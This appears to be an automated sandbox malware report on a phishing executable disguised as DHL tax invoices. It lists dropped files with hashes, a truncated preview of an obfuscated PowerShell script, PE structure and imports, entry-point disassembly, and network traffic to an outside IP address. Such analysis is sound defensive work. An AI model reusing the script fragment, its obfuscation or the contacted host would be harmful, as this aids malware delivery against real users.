                                                          SHA1:A51248C69355B1C40B96EC66A6B4359FEFC3FD23
                                                          SHA-256:9E2477183DE438BCBF2CC3AF97CCB31D6E48BC2FCBAF882077865A20E31FFA66
                                                          SHA-512:F6CEE1F5C223A5FE75602F84B1584D77AF863E0F9DC7C8BE785B043D1274D3452DB9359EE3A3B56F15593ADDFB43D4136F60F69DDE966227C95E502C8BD47A8C
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):362225
                                                          Entropy (8bit):7.583959296966973
                                                          Encrypted:false
                                                          SSDEEP:6144:QiYECBdMEjlgweL1zv/JCXutRa4b8xm1TeTjy0Vjh26Gi7MhQFmLzHDMfLxq:7YEsuweLDCe3BY0UGgh2ji7MaAzHcNq
                                                          MD5:213296C17D11ADF994B3D8EEA2F44497
                                                          SHA1:48CB90D8D8063EF5CA129084CED6F9279CDF31B0
                                                          SHA-256:7603126A3E7F1258479357E5DF46BCDF769004B536F678F4BFF0BD72FE1AB816
                                                          SHA-512:77C4A3CC051ED8EEAAEA917E077170E413C1BD80ED119ACDD40B699025BD72C26907CE108F4CBE1396F38737FAB73FA92AC55153DDE4323661C78DDA62151BD4
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):870646
                                                          Entropy (8bit):6.6567275260390995
                                                          Encrypted:false
                                                          SSDEEP:12288:agyMCmL5EW2zV3mDinwWxjQKQpUGk06VqbwQX3isAr:YViiwwEKQpUs6swI32
                                                          MD5:9751F18FB374BF112F867381A68BB3A9
                                                          SHA1:B6690412B3CE7E65D76437B4D6704A3646E62938
                                                          SHA-256:D53AFBFC333ACB95639354FE5EB9CDDCE8FC0F59190D23DBFA60FEC9944A5E27
                                                          SHA-512:B42A8071E8234C62FBD8028E9F364A39B0DAEB7A62B7CCBC94F3588CDDA7BE93953834C737AB01B3FEEBCC51665A0A528EDE9F2042AF369AD3A1ECEE69BD8B6F
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 13%, Browse
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):710597
                                                          Entropy (8bit):0.4275192651871367
                                                          Encrypted:false
                                                          SSDEEP:768:WKRtrtXot873KIx+BWGvZsb7SKsoisH3kQJ3FbQPKbffiJy/pk5XC2F1TmdxCN1h:Wov60Q2ip
                                                          MD5:45DE86E7EC59C5E4E5FB2ED53061188D
                                                          SHA1:E2FD2269F4645EECE08831DD5CACC4635D500E06
                                                          SHA-256:A18183D891AE2282D9051D4D462DDA1B346085AE0E7AF525F5C31B4F20B803D2
                                                          SHA-512:2F8A2402C46B277A6B8741093B845DC3E3E6B3526910D6C10E3A86D1A0EEE8A157CA0156989A1A99B7006CF7BA24D11FFAD43FE9CC0B8B257C5513F6BF390BB8
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:ASCII text, with very long lines (51121), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):51121
                                                          Entropy (8bit):5.447671723801437
                                                          Encrypted:false
                                                          SSDEEP:1536:8cdYRGdh2mJBi9i2cMJC/uvyxOd8maeZ1q6KwDN2C:Bbh7J+5CHxOdbn1qr2Nh
                                                          MD5:26AC3D358904DE47313A08E6E95B9EF8
                                                          SHA1:D8CB62FA3F065244D37862489962401A3C829A9A
                                                          SHA-256:A87DC179EA36DF155F5D8B7A8A5963EF1DE61FA7032DB510A8A1F64033182FF2
                                                          SHA-512:EFC8932A6E6CB055FD76603CADE1CE298C2D19F250D9E3234255F55B2EC28B6C34345F35A017816B35400A4258EB0CCA8FDF885A1C8B5F0C08F50731D17BAE71
                                                          Malicious:true
                                                          Preview:$Dollars=$materialism;<#Indicates Phonic Priskas Flaith Underfor Vectorizing #><#Kolera Helhedsbetragtninger korkblte Betjentstuens #><#Dorsulum Handmaids Nulkomponents ideassociationerne #><#unasthmatic Sencio Dollarerne Intricateness #><#Nummerplade Papirnusser Generalljtnanternes Sikkerhedsmaessige Angiospastic mortificationers #><#Beliggenheds Tretaaedes Betrak Brassier Paniculated #><#Forebearing Prventionernes Hotelvrelsers Mossberry Anthropomorphise amboina Dynamitish #><#Ephesus Kuldkastningen Settled Udvejede Salim Formentliges #><#Orangy Kongrespaladsets Brutalized Tapetserbordenes Extraversions Skr #><#Slurkenes Sowed Zonite lftebevgelserne Iconotype #><#Gedske Edwina vinstue #><#Depechers forskruede officinernes Trappabilities #><#Afgrnsedes Natuglerne Scallom Kurdisk #><#Investeringsforening Besteget Oleum Ripstop Symmory Dorer #><#Skrners Eftertragte Teposerne Duomos Oidiomycosis Dissepimental #><#Dominoet Subtilitets Gennemrejs Diakinesis Opvurder Kofoed Atlantean #><#tr
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):677204
                                                          Entropy (8bit):0.4271945994938534
                                                          Encrypted:false
                                                          SSDEEP:768:Cg6nSaeWp7roSf5WH9ybdJP/tn7PA43zK+1BoED5f74ZkD/MK1Z7M2E039ZCS2tD:85Fqk
                                                          MD5:359EC97A933B88A53AF37470C2A65967
                                                          SHA1:047DAAFFAA0024F646A7D3E0B2E475413C43C7E6
                                                          SHA-256:B20E10FF5D29A94D05C4C0D0120A7A3489182EC8E76D98BAF34A946E9F1A0583
                                                          SHA-512:76A4F29170B6249F47245D0DCE1B4595DB98D564583FBD286C693CEBB31206A7460F4A3C4BEF3338E6BA2DA7062536F43DA141B744503228B8E8D90B7DA43532
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:ASCII text, with very long lines (317), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):545
                                                          Entropy (8bit):4.27451532888585
                                                          Encrypted:false
                                                          SSDEEP:12:v6ukGX3KlkBTXETX5eWxrBtZ7mr8f/O9WFv+e8ZDXG+F3/guZo9rLn:5dKlkBTQJXBz7L6W78RXRx/guZo9rLn
                                                          MD5:4B698DA0F4172BEAFB7948D5A9BB6E32
                                                          SHA1:1F340DA3FFA3D44921DB00B64E1131C3E9C7E55C
                                                          SHA-256:535E3C82563232C3CAB08FD3AC94B7FF3F5C40EDF4FC345222B2516D3C3E9C6C
                                                          SHA-512:5C109BFDA596E6ECF211C077E9A75A70C5559DF9C30CC4A01F0828326227103F1F960F201E1615102765270C4937F79942381E8B0889D71C885253803EDAED07
                                                          Malicious:false
                                                          Preview:smidighederne kikke damefrisrinder rosanna hundeslaede nynnende confated..palapteryx flexured beckoning tven diamantbryllupperne verdenskrig anseeligst,tilbagetraeden phasiron husbandlike quarenden,minimales vindene rboernes ssort galactolysis velbeholden.unreave afslutningsdebatter elokvensen youdendrift metodisme battende photoisomeric rhombogene rgvarernes bookmakers trawley priklepind..psittacosis ovillus multivoltine honningers aflight giggled printteksters brndstrup interknotting hyoglossal almenmenneskelig ventricous drillevornere..
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):516910
                                                          Entropy (8bit):0.4280710301837487
                                                          Encrypted:false
                                                          SSDEEP:768:O8HlxWnNCSVvAb60ku7WszE7e3P6z80nOEPFGQCr//vhS3KN5MFzk:XWoF
                                                          MD5:BF4C39957B38842B30C3AD3B3E6C7B12
                                                          SHA1:DA2223F3437AC09EDE73BC0F04D4CCD20E53CCA2
                                                          SHA-256:6AAAC21670C9D5FAFC0487B0F83F2E7104EF5D1F8989707D0227175389E4EBA8
                                                          SHA-512:003AF17DE7AF3C3D1FABF67D3684D7B3B219125E5B0CFAFD6C3F5898797D646F58700C6DCE09D07B1F6C9CF2BDA0E4BEA027A0F610559BAB81A7E4A4D9C8FBF5
                                                          Malicious:false
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):6.6567275260390995
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:DHL TAX INVOICES - MARCH 2024.exe
                                                          File size:870'646 bytes
                                                          MD5:9751f18fb374bf112f867381a68bb3a9
                                                          SHA1:b6690412b3ce7e65d76437b4d6704a3646e62938
                                                          SHA256:d53afbfc333acb95639354fe5eb9cddce8fc0f59190d23dbfa60fec9944a5e27
                                                          SHA512:b42a8071e8234c62fbd8028e9f364a39b0daeb7a62b7ccbc94f3588cdda7be93953834c737ab01b3feebcc51665a0a528ede9f2042af369ad3a1ecee69bd8b6f
                                                          SSDEEP:12288:agyMCmL5EW2zV3mDinwWxjQKQpUGk06VqbwQX3isAr:YViiwwEKQpUs6swI32
                                                          TLSH:2B05AE87AA8BA5C5C1D7067395D286C04B5FBFB443A90FC1D749B222DD3158EBE03E1A
                                                          Icon Hash:1e76e3211819190f
                                                          Entrypoint:0x4033b6
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                                          Instruction
                                                          sub esp, 000002D4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          pop edi
                                                          xor ebx, ebx
                                                          push 00008001h
                                                          mov dword ptr [esp+14h], ebx
                                                          mov dword ptr [esp+10h], 0040A230h
                                                          mov dword ptr [esp+1Ch], ebx
                                                          call dword ptr [004080B4h]
                                                          call dword ptr [004080B0h]
                                                          cmp ax, 00000006h
                                                          je 00007F4554D928F3h
                                                          push ebx
                                                          call 00007F4554D95A4Ch
                                                          cmp eax, ebx
                                                          je 00007F4554D928E9h
                                                          push 00000C00h
                                                          call eax
                                                          mov esi, 004082B8h
                                                          push esi
                                                          call 00007F4554D959C6h
                                                          push esi
                                                          call dword ptr [0040815Ch]
                                                          lea esi, dword ptr [esi+eax+01h]
                                                          cmp byte ptr [esi], 00000000h
                                                          jne 00007F4554D928CCh
                                                          push ebp
                                                          push 00000009h
                                                          call 00007F4554D95A1Eh
                                                          push 00000007h
                                                          call 00007F4554D95A17h
                                                          mov dword ptr [0042A244h], eax
                                                          call dword ptr [0040803Ch]
                                                          push ebx
                                                          call dword ptr [004082A4h]
                                                          mov dword ptr [0042A2F8h], eax
                                                          push ebx
                                                          lea eax, dword ptr [esp+34h]
                                                          push 000002B4h
                                                          push eax
                                                          push ebx
                                                          push 004216E8h
                                                          call dword ptr [00408188h]
                                                          push 0040A384h
                                                          push 00429240h
                                                          call 00007F4554D95600h
                                                          call dword ptr [004080ACh]
                                                          mov ebp, 00435000h
                                                          push eax
                                                          push ebp
                                                          call 00007F4554D955EEh
                                                          push ebx
                                                          call dword ptr [00408174h]
                                                          add word ptr [eax], 0000h
                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x48000 | 0x5d5b0 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x1000 | 0x615d | 0x6200 | c5c0065fc4c103ac2469dafdce131fb4 | False | 0.6616709183673469 | data | 6.45041359169741 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata | 0x8000 | 0x13a4 | 0x1400 | 4ac891d4ddf58633f14436f9f80ac6b6 | False | 0.4529296875 | data | 5.163001655755973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data | 0xa000 | 0x20338 | 0x600 | 66b45fceba0f24d768fb09e0afe23c99 | False | 0.5026041666666666 | data | 3.9824009583068882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .ndata | 0x2b000 | 0x1d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc | 0x48000 | 0x5d5b0 | 0x5d600 | 8a67a6dd81a0dde63aad310efed593c4 | False | 0.19508502761044177 | data | 3.9086848256359468 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                          RT_ICON | 0x48370 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.14949551735361127
                                                          RT_ICON | 0x8a398 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.23527150124216253
                                                          RT_ICON | 0x9abc0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3454180444024563
                                                          RT_ICON | 0x9ede8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3813278008298755
                                                          RT_ICON | 0xa1390 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.46153846153846156
                                                          RT_ICON | 0xa2438 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5978144989339019
                                                          RT_ICON | 0xa32e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4786885245901639
                                                          RT_ICON | 0xa3c68 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.73014440433213
                                                          RT_ICON | 0xa4510 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4725433526011561
                                                          RT_ICON | 0xa4a78 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6799645390070922
                                                          RT_DIALOG | 0xa4ee0 | 0x100 | data | English | United States | 0.5234375
                                                          RT_DIALOG | 0xa4fe0 | 0xf8 | data | English | United States | 0.6370967741935484
                                                          RT_DIALOG | 0xa50d8 | 0xa0 | data | English | United States | 0.6125
                                                          RT_DIALOG | 0xa5178 | 0x60 | data | English | United States | 0.7291666666666666
                                                          RT_GROUP_ICON | 0xa51d8 | 0x92 | data | English | United States | 0.6506849315068494
                                                          RT_MANIFEST | 0xa5270 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
                                                          DLL | Import
                                                          KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                          USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                          GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                          SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                          ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                          COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                          ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                          Language of compilation system | Country where language is spoken | Map
                                                          English | United States |
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Mar 28, 2024 08:01:59.888643980 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888680935 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888736010 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888792992 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888803005 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888819933 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888834953 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888856888 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888883114 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888925076 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.888931990 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.888966084 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.889208078 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.889246941 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.889257908 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.889292002 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:01:59.889303923 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:01:59.889339924 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087126970 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087178946 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087192059 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087219954 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087220907 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087259054 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087354898 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087368965 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087380886 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087392092 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087410927 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087426901 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087454081 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087466002 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087498903 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087548018 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087579012 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087625027 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087641001 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087683916 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087760925 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087816000 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087836981 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087879896 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087887049 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087929964 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.087944031 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.087987900 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088020086 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088063955 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088076115 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088124037 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088128090 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088164091 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088268995 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088282108 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088294029 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088305950 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088313103 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088335991 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088345051 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088367939 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088392973 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088414907 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088447094 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088455915 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088486910 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088541031 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088579893 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088601112 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088643074 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088653088 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088696003 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088705063 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088747025 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088762045 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088804007 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088804960 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088819981 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088850021 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088861942 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088895082 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088943005 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.088943958 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088984966 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.088994980 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089045048 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089051962 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089066029 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089095116 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089096069 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089114904 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089119911 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089132071 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089142084 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089158058 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089175940 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.089180946 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.089220047 CET4973680192.168.2.483.137.157.76
                                                          Mar 28, 2024 08:02:00.286565065 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286593914 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286657095 CET804973683.137.157.76192.168.2.4
                                                          Mar 28, 2024 08:02:00.286668062 CET4973680192.168.2.483.137.157.76
